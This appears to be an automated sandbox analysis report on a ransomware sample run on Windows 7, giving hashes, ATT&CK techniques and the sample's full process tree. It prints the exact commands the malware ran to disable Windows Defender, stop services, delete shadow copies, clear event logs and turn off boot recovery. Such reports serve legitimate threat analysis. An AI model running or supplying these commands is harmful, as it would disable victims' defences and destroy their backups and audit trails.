af9e8f301a3677b457345921d7ee765a842eceb7df107714eaffc6193bfc6bbe

Resubmissions

03-03-2024 10:17

240303-mbhz2aha6s 7

03-03-2024 10:02

240303-l27kmshd24 10

Analysis

max time kernel
4s
max time network
0s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
03-03-2024 10:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

211xahcou.exe
Size

3.9MB
MD5

0e4d44dde522c07d09d9e3086cfae803
SHA1

d8dc26e2094869a0da78ecb47494c931419302dc
SHA256

33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277
SHA512

ac1f269b028217210a72fc5c2e0cb07461e2ff896f8b5ba65771787f99ec34b0f9951cf73d9d387086f79c348c343d147aebc2fd5b7e18da009bc2041e2eee06
SSDEEP

49152:e2NiZPNNirb/T2vO90dL3BmAFd4A64nsfJk0NuXCdmTQb0/6VCrrPrsbg11VgWA2:e2ANB04yIa0hsirubO

Score

10^/10

evasion ransomware trojan

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
292	MpCmdRun.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe

Clears Windows event logs 1 TTPs 3 IoCs

evasion ransomware

Indicator Removal

T1070

pid	Process
2996	wevtutil.exe
1744	wevtutil.exe
1740	wevtutil.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
2104	bcdedit.exe
1712	bcdedit.exe

Launches sc.exe 8 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2484	sc.exe
2884	sc.exe
1348	sc.exe
2444	sc.exe
2588	sc.exe
2652	sc.exe
2436	sc.exe
2348	sc.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
380	vssadmin.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1500	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeSecurityPrivilege	2996	wevtutil.exe
Token: SeBackupPrivilege	2996	wevtutil.exe
Token: SeSecurityPrivilege	1744	wevtutil.exe
Token: SeBackupPrivilege	1744	wevtutil.exe
Token: SeSecurityPrivilege	1740	wevtutil.exe
Token: SeBackupPrivilege	1740	wevtutil.exe
Token: SeIncreaseQuotaPrivilege	960	wmic.exe
Token: SeSecurityPrivilege	960	wmic.exe
Token: SeTakeOwnershipPrivilege	960	wmic.exe
Token: SeLoadDriverPrivilege	960	wmic.exe
Token: SeSystemProfilePrivilege	960	wmic.exe
Token: SeSystemtimePrivilege	960	wmic.exe
Token: SeProfSingleProcessPrivilege	960	wmic.exe
Token: SeIncBasePriorityPrivilege	960	wmic.exe
Token: SeCreatePagefilePrivilege	960	wmic.exe
Token: SeBackupPrivilege	960	wmic.exe
Token: SeRestorePrivilege	960	wmic.exe
Token: SeShutdownPrivilege	960	wmic.exe
Token: SeDebugPrivilege	960	wmic.exe
Token: SeSystemEnvironmentPrivilege	960	wmic.exe
Token: SeRemoteShutdownPrivilege	960	wmic.exe
Token: SeUndockPrivilege	960	wmic.exe
Token: SeManageVolumePrivilege	960	wmic.exe
Token: 33	960	wmic.exe
Token: 34	960	wmic.exe
Token: 35	960	wmic.exe
Token: SeIncreaseQuotaPrivilege	3040	wmic.exe
Token: SeSecurityPrivilege	3040	wmic.exe
Token: SeTakeOwnershipPrivilege	3040	wmic.exe
Token: SeLoadDriverPrivilege	3040	wmic.exe
Token: SeSystemProfilePrivilege	3040	wmic.exe
Token: SeSystemtimePrivilege	3040	wmic.exe
Token: SeProfSingleProcessPrivilege	3040	wmic.exe
Token: SeIncBasePriorityPrivilege	3040	wmic.exe
Token: SeCreatePagefilePrivilege	3040	wmic.exe
Token: SeBackupPrivilege	3040	wmic.exe
Token: SeRestorePrivilege	3040	wmic.exe
Token: SeShutdownPrivilege	3040	wmic.exe
Token: SeDebugPrivilege	3040	wmic.exe
Token: SeSystemEnvironmentPrivilege	3040	wmic.exe
Token: SeRemoteShutdownPrivilege	3040	wmic.exe
Token: SeUndockPrivilege	3040	wmic.exe
Token: SeManageVolumePrivilege	3040	wmic.exe
Token: 33	3040	wmic.exe
Token: 34	3040	wmic.exe
Token: 35	3040	wmic.exe
Token: SeIncreaseQuotaPrivilege	3040	wmic.exe
Token: SeSecurityPrivilege	3040	wmic.exe
Token: SeTakeOwnershipPrivilege	3040	wmic.exe
Token: SeLoadDriverPrivilege	3040	wmic.exe
Token: SeSystemProfilePrivilege	3040	wmic.exe
Token: SeSystemtimePrivilege	3040	wmic.exe
Token: SeProfSingleProcessPrivilege	3040	wmic.exe
Token: SeIncBasePriorityPrivilege	3040	wmic.exe
Token: SeCreatePagefilePrivilege	3040	wmic.exe
Token: SeBackupPrivilege	3040	wmic.exe
Token: SeRestorePrivilege	3040	wmic.exe
Token: SeShutdownPrivilege	3040	wmic.exe
Token: SeDebugPrivilege	3040	wmic.exe
Token: SeSystemEnvironmentPrivilege	3040	wmic.exe
Token: SeRemoteShutdownPrivilege	3040	wmic.exe
Token: SeUndockPrivilege	3040	wmic.exe
Token: SeManageVolumePrivilege	3040	wmic.exe
Token: 33	3040	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2224 wrote to memory of 2944	2224	211xahcou.exe	28
PID 2224 wrote to memory of 2944	2224	211xahcou.exe	28
PID 2224 wrote to memory of 2944	2224	211xahcou.exe	28
PID 2944 wrote to memory of 636	2944	net.exe	30
PID 2944 wrote to memory of 636	2944	net.exe	30
PID 2944 wrote to memory of 636	2944	net.exe	30
PID 2224 wrote to memory of 2336	2224	211xahcou.exe	31
PID 2224 wrote to memory of 2336	2224	211xahcou.exe	31
PID 2224 wrote to memory of 2336	2224	211xahcou.exe	31
PID 2336 wrote to memory of 2680	2336	net.exe	33
PID 2336 wrote to memory of 2680	2336	net.exe	33
PID 2336 wrote to memory of 2680	2336	net.exe	33
PID 2224 wrote to memory of 1808	2224	211xahcou.exe	34
PID 2224 wrote to memory of 1808	2224	211xahcou.exe	34
PID 2224 wrote to memory of 1808	2224	211xahcou.exe	34
PID 1808 wrote to memory of 2564	1808	net.exe	36
PID 1808 wrote to memory of 2564	1808	net.exe	36
PID 1808 wrote to memory of 2564	1808	net.exe	36
PID 2224 wrote to memory of 2572	2224	211xahcou.exe	37
PID 2224 wrote to memory of 2572	2224	211xahcou.exe	37
PID 2224 wrote to memory of 2572	2224	211xahcou.exe	37
PID 2572 wrote to memory of 2632	2572	net.exe	39
PID 2572 wrote to memory of 2632	2572	net.exe	39
PID 2572 wrote to memory of 2632	2572	net.exe	39
PID 2224 wrote to memory of 2644	2224	211xahcou.exe	40
PID 2224 wrote to memory of 2644	2224	211xahcou.exe	40
PID 2224 wrote to memory of 2644	2224	211xahcou.exe	40
PID 2644 wrote to memory of 2576	2644	net.exe	42
PID 2644 wrote to memory of 2576	2644	net.exe	42
PID 2644 wrote to memory of 2576	2644	net.exe	42
PID 2224 wrote to memory of 2772	2224	211xahcou.exe	43
PID 2224 wrote to memory of 2772	2224	211xahcou.exe	43
PID 2224 wrote to memory of 2772	2224	211xahcou.exe	43
PID 2772 wrote to memory of 2284	2772	net.exe	45
PID 2772 wrote to memory of 2284	2772	net.exe	45
PID 2772 wrote to memory of 2284	2772	net.exe	45
PID 2224 wrote to memory of 2972	2224	211xahcou.exe	46
PID 2224 wrote to memory of 2972	2224	211xahcou.exe	46
PID 2224 wrote to memory of 2972	2224	211xahcou.exe	46
PID 2972 wrote to memory of 2692	2972	net.exe	48
PID 2972 wrote to memory of 2692	2972	net.exe	48
PID 2972 wrote to memory of 2692	2972	net.exe	48
PID 2224 wrote to memory of 2452	2224	211xahcou.exe	49
PID 2224 wrote to memory of 2452	2224	211xahcou.exe	49
PID 2224 wrote to memory of 2452	2224	211xahcou.exe	49
PID 2452 wrote to memory of 2604	2452	net.exe	51
PID 2452 wrote to memory of 2604	2452	net.exe	51
PID 2452 wrote to memory of 2604	2452	net.exe	51
PID 2224 wrote to memory of 2444	2224	211xahcou.exe	52
PID 2224 wrote to memory of 2444	2224	211xahcou.exe	52
PID 2224 wrote to memory of 2444	2224	211xahcou.exe	52
PID 2224 wrote to memory of 2588	2224	211xahcou.exe	54
PID 2224 wrote to memory of 2588	2224	211xahcou.exe	54
PID 2224 wrote to memory of 2588	2224	211xahcou.exe	54
PID 2224 wrote to memory of 2652	2224	211xahcou.exe	56
PID 2224 wrote to memory of 2652	2224	211xahcou.exe	56
PID 2224 wrote to memory of 2652	2224	211xahcou.exe	56
PID 2224 wrote to memory of 2436	2224	211xahcou.exe	58
PID 2224 wrote to memory of 2436	2224	211xahcou.exe	58
PID 2224 wrote to memory of 2436	2224	211xahcou.exe	58
PID 2224 wrote to memory of 2348	2224	211xahcou.exe	60
PID 2224 wrote to memory of 2348	2224	211xahcou.exe	60
PID 2224 wrote to memory of 2348	2224	211xahcou.exe	60
PID 2224 wrote to memory of 2484	2224	211xahcou.exe	62

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\211xahcou.exe
"C:\Users\Admin\AppData\Local\Temp\211xahcou.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2224
- C:\Windows\system32\net.exe
  net.exe stop "NetMsmqActivator" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2944
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "NetMsmqActivator" /y
    3⤵
    PID:636
- C:\Windows\system32\net.exe
  net.exe stop "SamSs" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2336
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SamSs" /y
    3⤵
    PID:2680
- C:\Windows\system32\net.exe
  net.exe stop "SDRSVC" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1808
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SDRSVC" /y
    3⤵
    PID:2564
- C:\Windows\system32\net.exe
  net.exe stop "SstpSvc" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2572
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SstpSvc" /y
    3⤵
    PID:2632
- C:\Windows\system32\net.exe
  net.exe stop "UI0Detect" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2644
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "UI0Detect" /y
    3⤵
    PID:2576
- C:\Windows\system32\net.exe
  net.exe stop "VSS" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2772
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "VSS" /y
    3⤵
    PID:2284
- C:\Windows\system32\net.exe
  net.exe stop "wbengine" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2972
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "wbengine" /y
    3⤵
    PID:2692
- C:\Windows\system32\net.exe
  net.exe stop "WebClient" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2452
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "WebClient" /y
    3⤵
    PID:2604
- C:\Windows\system32\sc.exe
  sc.exe config "NetMsmqActivator" start= disabled
  2⤵
  - Launches sc.exe
  PID:2444
- C:\Windows\system32\sc.exe
  sc.exe config "SamSs" start= disabled
  2⤵
  - Launches sc.exe
  PID:2588
- C:\Windows\system32\sc.exe
  sc.exe config "SDRSVC" start= disabled
  2⤵
  - Launches sc.exe
  PID:2652
- C:\Windows\system32\sc.exe
  sc.exe config "SstpSvc" start= disabled
  2⤵
  - Launches sc.exe
  PID:2436
- C:\Windows\system32\sc.exe
  sc.exe config "UI0Detect" start= disabled
  2⤵
  - Launches sc.exe
  PID:2348
- C:\Windows\system32\sc.exe
  sc.exe config "VSS" start= disabled
  2⤵
  - Launches sc.exe
  PID:2484
- C:\Windows\system32\sc.exe
  sc.exe config "wbengine" start= disabled
  2⤵
  - Launches sc.exe
  PID:2884
- C:\Windows\system32\sc.exe
  sc.exe config "WebClient" start= disabled
  2⤵
  - Launches sc.exe
  PID:1348
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:2704
- C:\Windows\system32\reg.exe
  reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  2⤵
  PID:2696
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:2740
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  2⤵
  PID:2852
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  2⤵
  PID:2856
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:1324
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:1584
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2392
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2304
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:1196
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  2⤵
  PID:1972
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  2⤵
  PID:2016
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  2⤵
  PID:1776
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  2⤵
  PID:1720
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:1904
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:540
- C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  2⤵
  PID:780
- C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  2⤵
  PID:596
- C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  2⤵
  PID:2212
- C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  2⤵
  PID:1528
- C:\Windows\system32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  2⤵
  PID:1684
- C:\Windows\system32\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  2⤵
  PID:1760
- C:\Windows\system32\reg.exe
  reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  2⤵
  PID:1420
- C:\Windows\system32\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  2⤵
  PID:2916
- C:\Windows\system32\reg.exe
  reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:856
- C:\Windows\system32\reg.exe
  reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:308
- C:\Windows\system32\reg.exe
  reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:2252
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:2788
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:2272
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:2068
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:2064
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies security service
  PID:1788
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:500
- C:\Windows\system32\vssadmin.exe
  vssadmin.exe delete shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:380
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl system
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:2996
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl security
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:1744
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl application
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:1740
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe SHADOWCOPY /nointeractive
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:960
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe shadowcopy delete
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3040
- C:\Windows\system32\bcdedit.exe
  bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2104
- C:\Windows\system32\bcdedit.exe
  bcdedit.exe /set {default} recoveryenabled no
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:1712
- C:\Windows\system32\cmd.exe
  cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
  2⤵
  PID:2316
- - C:\Program Files\Windows Defender\MpCmdRun.exe
    "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    3⤵
    - Deletes Windows Defender Definitions
    PID:292
- C:\Windows\system32\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
  2⤵
  PID:2352
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableIOAVProtection $true
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1500
- C:\Windows\system32\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  2⤵
  PID:1960
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableRealtimeMonitoring $true
    3⤵
    PID:2936

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\license.html.jrrgFzovLoWtS9iBFDAoX_hkkzMq3QOei2aOKvm9K0j_AAAAAAAAAAA0.cv2gj

Filesize
8KB

MD5
67712d2b91a7486b24620ff191e41b1f

SHA1
a0a87c87aa13a693d89ad290e28a86ad5716de44

SHA256
83cad2fa923aa374c1c57d793a1732f555f747e2a90f82879df4b5753658c7f6

SHA512
6f073ef74b80b91405c21c7a062f3172b1c19de8e8a611e0995878b996681eb00ebb80afac0bd628a931e1f148a9ddaa0969689e4058b816a3200973d546ed91

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.jrrgFzovLoWtS9iBFDAoX_hkkzMq3QOei2aOKvm9K0j_AAAAAAAAAAA0.cv2gj

Filesize
12KB

MD5
7be06090bd2ed024b2719937fb991ef2

SHA1
9377ded1f1aca714ed0efb6140d1236435608c34

SHA256
c8ee9390df4e6bc13aa9269546d35650e57e69d8100325b28a8ff229c5d337c3

SHA512
8473f625bf623ac496a91ec70f7375bc97bc492b97d99d0b195d0a94c0c7e504719cb5c07c1048106549a75ade6839f6ff8cdb29d7fb7f81f5897e9f03d24c22

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA.jrrgFzovLoWtS9iBFDAoX_hkkzMq3QOei2aOKvm9K0j_AAAAAAAAAAA0.cv2gj

Filesize
7KB

MD5
a6cb8eb536643c76fad3eb3b5aaa9c85

SHA1
53c327679f478845a0c4d8e6b8f8358468e0b608

SHA256
998df3165f1ce3c6c58cf7e331d2cc00151fe71a74d24dc99dd7cfbd0f17e73b

SHA512
b78cc0fcf9ad7d92757ff2573a847454d899409bab0af6ced053d5062cc1d29517bb4ab18dc54f020732c775ab8a7aa86d92a90638af21b87393df6cb785dbee

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\eclipse.inf.jrrgFzovLoWtS9iBFDAoX_hkkzMq3QOei2aOKvm9K0j_AAAAAAAAAAA0.cv2gj

Filesize
57B

MD5
adf99b54fd6f317b611320564167c305

SHA1
d3d80dd39b686e04bf31db6ac9335084e841ef73

SHA256
1b68454d53e781f8793547fde8fcb2f3b03b5c8134f37b9d8c4045cb8a5473f3

SHA512
65fb44cdaf01632d60ecf3b49ab1eb661982ee8b6a430dcf6d1e75789787c9e7356754cd071421ca44a1b32ab918be97a630b1b0ca722383eea56d40fa131642

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
2d0ddf8a3d0db54112ae9099ac882e8e

SHA1
2f2b6285016a2be62d74fbe227b6b21d67ba6469

SHA256
575db2c75918557c6eabdd7db54bd7e7fe4228e752b1ac0a75d2c34ae747c3c7

SHA512
514b6dabc61eef9a6ba21770ee6c2fbd7f41aefbaac7a42d2863a323923585391c98173d244a90aaa63075c1bf6568b7322145eea5878a1334acc1dc556cb659

Download Submit
memory/1500-10-0x0000000002A50000-0x0000000002AD0000-memory.dmp

Filesize
512KB

Download
memory/1500-13-0x0000000002A50000-0x0000000002AD0000-memory.dmp

Filesize
512KB

Download
memory/1500-14-0x000007FEF57C0000-0x000007FEF615D000-memory.dmp

Filesize
9.6MB

Download
memory/1500-11-0x000007FEF57C0000-0x000007FEF615D000-memory.dmp

Filesize
9.6MB

Download
memory/1500-12-0x0000000002A50000-0x0000000002AD0000-memory.dmp

Filesize
512KB

Download
memory/1500-7-0x000000001B540000-0x000000001B822000-memory.dmp

Filesize
2.9MB

Download
memory/1500-9-0x000007FEF57C0000-0x000007FEF615D000-memory.dmp

Filesize
9.6MB

Download
memory/1500-8-0x0000000001D90000-0x0000000001D98000-memory.dmp

Filesize
32KB

Download
memory/2936-23-0x0000000001E10000-0x0000000001E18000-memory.dmp

Filesize
32KB

Download
memory/2936-22-0x00000000029C0000-0x0000000002A40000-memory.dmp

Filesize
512KB

Download
memory/2936-20-0x000000001B580000-0x000000001B862000-memory.dmp

Filesize
2.9MB

Download
memory/2936-27-0x00000000029C0000-0x0000000002A40000-memory.dmp

Filesize
512KB

Download
memory/2936-28-0x000007FEF4E20000-0x000007FEF57BD000-memory.dmp

Filesize
9.6MB

Download
memory/2936-25-0x00000000029C0000-0x0000000002A40000-memory.dmp

Filesize
512KB

Download
memory/2936-26-0x00000000029C0000-0x0000000002A40000-memory.dmp

Filesize
512KB

Download
memory/2936-24-0x000007FEF4E20000-0x000007FEF57BD000-memory.dmp

Filesize
9.6MB

Download
memory/2936-21-0x000007FEF4E20000-0x000007FEF57BD000-memory.dmp

Filesize
9.6MB

Download